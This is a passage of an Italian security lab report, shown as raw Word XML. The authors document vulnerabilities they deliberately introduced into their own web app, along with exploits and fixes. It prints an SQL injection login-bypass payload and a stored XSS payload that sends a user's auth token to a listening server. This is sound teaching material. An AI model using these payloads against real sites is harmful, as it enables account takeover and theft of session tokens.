                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1469979788" name="Casella di testo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wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="59367F12" w14:textId="2246AB06"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5</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CDD1" id="_x0000_s1052" type="#_x0000_t202" style="position:absolute;margin-left:-26.7pt;margin-top:104.1pt;width:53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bGw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p9vZbHHDmaTY4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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="59367F12" w14:textId="2246AB06" w:rsidR="00CA09AC" w:rsidRPr="00344A5F"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5</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java con metodo non vulnerabile</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251800576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="19CC3529" wp14:editId="678977A1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>381000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>320675</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6781165" cy="944245"/>
            <wp:effectExtent l="0" t="0" r="635" b="8255"/>
            <wp:wrapNone/>
            <wp:docPr id="386129419" name="Immagine 1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9419" name="Immagine 14" descr="Immagine che contiene testo, Carattere, linea, schermata&#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47660" b="-426"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6781165"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33AFB" w14:textId="3554CB7B" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="2D8A3B9E" w14:textId="27B74CA9" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="33ED1CD4" w14:textId="708E0B71" w:rsidR="004B30FC" w:rsidRDefault="004B30FC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="28EC353C" w14:textId="3F434FD7" w:rsidR="00C46E60" w:rsidRDefault="00C46E60" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3E936841" w14:textId="77777777" w:rsidR="00681873" w:rsidRDefault="00681873" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0C8094F3" w14:textId="5037DDE5" w:rsidR="00FC6340" w:rsidRPr="00CA09AC" w:rsidRDefault="00FC6340" w:rsidP="00CA09AC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA09AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CEA654" w14:textId="0AC81FE4" w:rsidR="00F13DB4" w:rsidRDefault="00F13DB4" w:rsidP="00CA09AC">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00F13DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>: UserController.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B51A6D" w14:textId="31D05810" w:rsidR="00F13DB4" w:rsidRDefault="00F13DB4" w:rsidP="00CA09AC">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00F13DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riga</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="009769CB">
        <w:t xml:space="preserve"> 298</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6492E891" w14:textId="77777777" w:rsidR="00F13DB4" w:rsidRDefault="00F13DB4" w:rsidP="00CA09AC">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DEB9857" w14:textId="3DCFB656" w:rsidR="00CA09AC" w:rsidRDefault="00992E84" w:rsidP="00CA09AC">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>È una vulnerabilità che consente all’attaccante di fare query verso il database con lo scopo di accedere o modificare dati che normalmente non potrebbe vedere come le password. Consente inoltre di fare il login in un sito senza essere a conoscenza di username e/o password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031017A5" w14:textId="77777777" w:rsidR="00CA09AC" w:rsidRDefault="00CA09AC" w:rsidP="00CA09AC">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AF2550A" w14:textId="7FC2D5DD" w:rsidR="00370316" w:rsidRDefault="00CA09AC" w:rsidP="00F13DB4">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Nel nostro codice è stata introdotta questa vulnerabilità nel login (</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA09AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/authenticate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> di </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA09AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>UserController</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA09AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.java</w:t>
      </w:r>
      <w:r>
        <w:t>) usando lo statement SQL</w:t>
      </w:r>
      <w:r w:rsidR="00A2084F">
        <w:t xml:space="preserve"> (Figura 26), il quale permette di concatenare stringhe che possono essere codice SQL.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5130275B" w14:textId="56E767BB" w:rsidR="00CA09AC" w:rsidRPr="00CA09AC" w:rsidRDefault="00CA09AC" w:rsidP="00FC6340">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA09AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCE68B8" w14:textId="6499D033" w:rsidR="00FC6340" w:rsidRDefault="00CA09AC" w:rsidP="00FC6340">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Quando si effettua il login, supponendo di conoscere il nome utente, si può fare l’autenticazione senza conoscere la password. In particolare</w:t>
      </w:r>
      <w:r w:rsidR="00A2084F">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sono stati usati</w:t>
      </w:r>
      <w:r w:rsidR="00FC6340">
        <w:t xml:space="preserve"> username=user e password=</w:t>
      </w:r>
      <w:r w:rsidR="00FC6340" w:rsidRPr="00FC6340">
        <w:t>a' or '1'='1</w:t>
      </w:r>
      <w:r w:rsidR="00FC6340">
        <w:t xml:space="preserve"> per fare l’attacco</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781465DD" w14:textId="77777777" w:rsidR="00CA09AC" w:rsidRDefault="00CA09AC" w:rsidP="007B1CF1">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02ACB9D2" w14:textId="06018837" w:rsidR="00CA09AC" w:rsidRPr="00CA09AC" w:rsidRDefault="00CA09AC" w:rsidP="007B1CF1">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA09AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659C0FBD" w14:textId="5631954E" w:rsidR="00FC6340" w:rsidRDefault="00FC6340" w:rsidP="007B1CF1">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Il fix è dato dal codice originale</w:t>
      </w:r>
      <w:r w:rsidR="00F35257">
        <w:t xml:space="preserve"> che non fa uso dell’SQL statement</w:t>
      </w:r>
      <w:r w:rsidR="00A2084F">
        <w:t xml:space="preserve"> (Figura 27).</w:t>
      </w:r>
      <w:r w:rsidR="008B0B12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F0CF1D" w14:textId="47B5EFC0" w:rsidR="00FC6340" w:rsidRPr="00FC6340" w:rsidRDefault="00CA09AC" w:rsidP="00FC6340">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251806720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="29BB63B8" wp14:editId="01C6C656">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-349885</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2105660</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6818630" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="2002719567" name="Casella di testo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0D25FE4" w14:textId="3A09B342"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6</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: UserController.java 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63B8" id="_x0000_s1053" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-27.55pt;margin-top:165.8pt;width:536.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Xo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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="00D25FE4" w14:textId="3A09B342" w:rsidR="00CA09AC" w:rsidRPr="00DF7375"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6</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java con metodo vulnerabile</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C46E60">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="12F66AFE" wp14:editId="7859CC8E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>203200</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6818810" cy="1845354"/>
            <wp:effectExtent l="0" t="0" r="1270" b="2540"/>
            <wp:wrapNone/>
            <wp:docPr id="439744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8810" cy="1845354"/>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134E607F"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38CF4F21" w14:textId="132648A3" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC">
      <w:r>
        <w:t>Fixed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA001F3" w14:textId="1DEEA024" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="0D565123" w14:textId="78D9774A" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3F22A96D" w14:textId="2566605E" w:rsidR="008B6F6D" w:rsidRDefault="00CA09AC" w:rsidP="00467BBC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251808768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="638BB9F5" wp14:editId="3F90A7C4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>678815</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2738120</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4760595" cy="635"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="725012666" name="Casella di testo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39A34F5B" w14:textId="76537A76"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7</w:t>
                            </w:r>
                            <w:r>
                              <w:fldChar w:fldCharType="end"/>
                            </w:r>
                            <w:r>
                              <w:t>: UserController.java con metod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B9F5" id="_x0000_s1054" type="#_x0000_t202" style="position:absolute;margin-left:53.45pt;margin-top:215.6pt;width:374.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W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Dgfzz7N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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="39A34F5B" w14:textId="76537A76" w:rsidR="00CA09AC" w:rsidRPr="0044473C" w:rsidRDefault="00CA09AC" w:rsidP="00CA09AC">
                      <w:pPr>
                        <w:pStyle w:val="Didascalia"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Figura </w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="begin"/>
                      </w:r>
                      <w:r>
                        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="separate"/>
                      </w:r>
                      <w:r w:rsidR="004E2F86">
                        <w:rPr>
                          <w:noProof/>
                        </w:rPr>
                        <w:t>27</w:t>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                      <w:r>
                        <w:t>: UserController.java con metodo originale</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251709440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3AD15ED4" wp14:editId="3E5B2D2C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>13335</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4760859" cy="2667723"/>
            <wp:effectExtent l="0" t="0" r="190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859" cy="2667723"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F84683" w14:textId="77777777" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="546C4086" w14:textId="77777777" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="6CCE269F" w14:textId="77777777" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="5F927F28" w14:textId="77777777" w:rsidR="00573261" w:rsidRDefault="00573261" w:rsidP="00467BBC"/>
    <w:p w14:paraId="427D09D0" w14:textId="77777777" w:rsidR="00CA09AC" w:rsidRDefault="00CA09AC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3D054A76" w14:textId="77777777" w:rsidR="00CA09AC" w:rsidRDefault="00CA09AC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="04DC4C0F" w14:textId="77777777" w:rsidR="00CA09AC" w:rsidRDefault="00CA09AC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="4FD794B1" w14:textId="77777777" w:rsidR="00CA09AC" w:rsidRDefault="00CA09AC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1774903E" w14:textId="77777777" w:rsidR="00CA09AC" w:rsidRDefault="00CA09AC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="1E6249DF" w14:textId="77777777" w:rsidR="00CA09AC" w:rsidRDefault="00CA09AC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3A164E06" w14:textId="77777777" w:rsidR="00CA09AC" w:rsidRDefault="00CA09AC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="3F2409CC" w14:textId="77777777" w:rsidR="00CA09AC" w:rsidRDefault="00CA09AC" w:rsidP="00467BBC"/>
    <w:p w14:paraId="73303B1C" w14:textId="77777777" w:rsidR="008B6F6D" w:rsidRDefault="008B6F6D" w:rsidP="00467BBC"/>
    <w:p w14:paraId="313974EC" w14:textId="78FAEBF3" w:rsidR="004B30FC" w:rsidRPr="00F13DB4" w:rsidRDefault="00C079D4" w:rsidP="00F13DB4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cross Site Scripting (</w:t>
      </w:r>
      <w:r w:rsidR="00D12C9A" w:rsidRPr="00F13DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>XSS Stored</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13DB4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8605E8" w14:textId="1D49A380" w:rsidR="0091567C" w:rsidRDefault="009015E9" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r>
        <w:t>: HomeController.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DD274B" w14:textId="2EEC87DE" w:rsidR="009015E9" w:rsidRDefault="009015E9" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Riga</w:t>
      </w:r>
      <w:r>
        <w:t>: 62</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75297809" w14:textId="77777777" w:rsidR="009015E9" w:rsidRDefault="009015E9" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43DA9D71" w14:textId="40CCD5FB" w:rsidR="009015E9" w:rsidRDefault="0091567C" w:rsidP="009015E9">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script JavaScript, HTML tag o HTML attributes</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> malevol</w:t>
      </w:r>
      <w:r w:rsidR="004A3A39">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> che, quando viene eseguito dall’utente che lo riceve, ruba</w:t>
      </w:r>
      <w:r w:rsidR="004A3A39">
        <w:t>no</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i suoi dati sensibili.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF35D6D" w14:textId="77777777" w:rsidR="009015E9" w:rsidRDefault="009015E9" w:rsidP="009015E9">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56A31214" w14:textId="6D839DD9" w:rsidR="009015E9" w:rsidRDefault="009015E9" w:rsidP="009015E9">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D197596" w14:textId="2CA0B9E2" w:rsidR="009015E9" w:rsidRDefault="009015E9" w:rsidP="009015E9">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In questo esempio, abbiamo aggiunto in </w:t>
      </w:r>
      <w:r w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HomeController.java</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> l’API </w:t>
      </w:r>
      <w:r w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/hello-user</w:t>
      </w:r>
      <w:r>
        <w:t>, al fine di poter inserire uno script nel nome di un hobby, inserito da un utente business, in modo tale che un normale user quando apre l’hobby esegue lo script</w:t>
      </w:r>
      <w:r w:rsidR="00C53E14">
        <w:t xml:space="preserve"> (Figura 28)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A25642" w14:textId="5B9024A4" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> 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img title="&lt;/script&gt;&lt;img src onerror=" var token = localStorage.getItem('token'); var img = new Image(); img.src = 'http://localhost:3000/log?token=' + encodeURIComponent(token); "&gt;"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C76201D" w14:textId="77777777" w:rsidR="00E16865" w:rsidRDefault="00E16865" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBAD4B8" w14:textId="0A31AAB0" w:rsidR="00D12C9A" w:rsidRDefault="00D12C9A" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>e permette di mostrare il token di autenticazione</w:t>
      </w:r>
      <w:r w:rsidR="00E16865">
        <w:t xml:space="preserve"> mandandolo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ad un server </w:t>
      </w:r>
      <w:r w:rsidR="00E16865">
        <w:t xml:space="preserve">in ascolto </w:t>
      </w:r>
      <w:r w:rsidR="00C53E14">
        <w:t xml:space="preserve">situato nel file </w:t>
      </w:r>
      <w:r w:rsidR="00C53E14" w:rsidRPr="00C53E14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSS_exploit.js</w:t>
      </w:r>
      <w:r w:rsidR="00C53E14">
        <w:t xml:space="preserve"> (Figura 30 e 31) nella directory </w:t>
      </w:r>
      <w:r w:rsidR="00C53E14" w:rsidRPr="00C53E14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSS_server</w:t>
      </w:r>
      <w:r w:rsidR="00C53E14">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che lo salva e lo </w:t>
      </w:r>
      <w:r w:rsidR="00E16865">
        <w:t xml:space="preserve">può </w:t>
      </w:r>
      <w:r>
        <w:t>sfrutt</w:t>
      </w:r>
      <w:r w:rsidR="00E16865">
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> per entrare nell’account dell’user. Di seguito il codice modificato sia nel backend che nel frontend. Nel frontend </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12C9A">
        <w:t xml:space="preserve">abbiamo creato username ed error in </w:t>
      </w:r>
      <w:r w:rsidR="009015E9" w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>App.js</w:t>
      </w:r>
      <w:r w:rsidR="009015E9">
        <w:t xml:space="preserve">. Tali parametri vengono passati al componente </w:t>
      </w:r>
      <w:r w:rsidR="009015E9" w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">eader.jsx </w:t>
      </w:r>
      <w:r w:rsidRPr="00D12C9A">
        <w:t xml:space="preserve">che </w:t>
      </w:r>
      <w:r w:rsidR="009015E9">
        <w:t>li passa a sua volta a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D12C9A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009015E9" w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>avbar</w:t>
      </w:r>
      <w:r w:rsidR="009015E9" w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.jsx</w:t>
      </w:r>
      <w:r w:rsidR="009015E9">
        <w:t xml:space="preserve">, nella quale avviene il fetch degli hobby relativi allo username dato per mostrarli sulla NavBar, come mostrato in Figura </w:t>
      </w:r>
      <w:r w:rsidR="00C53E14">
        <w:t>29.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F537CA" w14:textId="77777777" w:rsidR="0091567C" w:rsidRDefault="0091567C" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="232BAA58" w14:textId="77777777" w:rsidR="009015E9" w:rsidRDefault="00926F16" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="009015E9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fix</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311860B4" w14:textId="090127E0" w:rsidR="00926F16" w:rsidRDefault="009015E9" w:rsidP="00D12C9A">
      <w:pPr>
        <w:pStyle w:val="Paragrafoelenco"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00926F16">
        <w:t xml:space="preserve">ato backend è stato modificato </w:t>
      </w:r>
      <w:r w:rsidR="00C53E14">
        <w:t xml:space="preserve">l’API </w:t>
      </w:r>
      <w:r w:rsidR="00C53E14" w:rsidRPr="00C53E14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00926F16" w:rsidRPr="00C53E14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>helloUser</w:t>
      </w:r>
      <w:r w:rsidR="00926F16">
